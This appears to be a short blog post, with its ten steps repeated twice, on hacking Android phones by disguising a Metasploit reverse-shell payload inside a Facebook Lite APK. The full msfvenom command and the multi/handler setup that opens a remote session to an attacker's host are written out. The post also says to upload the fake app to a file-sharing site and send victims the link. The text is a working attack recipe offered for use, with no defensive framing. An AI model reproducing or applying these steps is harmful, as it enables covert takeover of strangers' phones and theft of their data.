ANDROID PHONE HACKING BY CREATING A FAKE APPLICATION
STEPS: fire up your kalilinux terminal
1 change the directory to Desktop---cd Desktop
2 list it using ls command----type ls
3 take any andrioid application i have use facebooklit.apk to d this attack(facebooklite.apk)
4. then type the following commands in the terminal
msfvenom -x facebooklite.apk -p android/meterpreter/reverse_tcp LHOST=(ip address)
LPORT=4444 -o facebook.apk(the fake apk)
5..upload the the facebook.apk(the fake apk to the uploadfiles .io)website to take out the lin(URL)
6.then type usemulti/handler
7.set payload android/meterpreter/reverse_tcp
8.set LHOST (internel ip)use ifconfig to find it out
9.set LPORT 4444
10..exploit
thats it........................
1 change the directory to Desktop---cd Desktop
2 list it using ls command----type ls
3 take any andrioid application i have use facebooklit.apk to d this attack(facebooklite.apk)
4. then type the following commands in the terminal
msfvenom -x facebooklite.apk -p android/meterpreter/reverse_tcp LHOST=(ip address)
LPORT=4444 -o facebook.apk(the fake apk)
5..upload the the facebook.apk(the fake apk to the uploadfiles .io)website to take out the lin(URL)
6.then type usemulti/handler
7.set payload android/meterpreter/reverse_tcp
8.set LHOST (internel ip)use ifconfig to find it out
9.set LPORT 4444
10..exploit
thats it........................
Comments
Post a Comment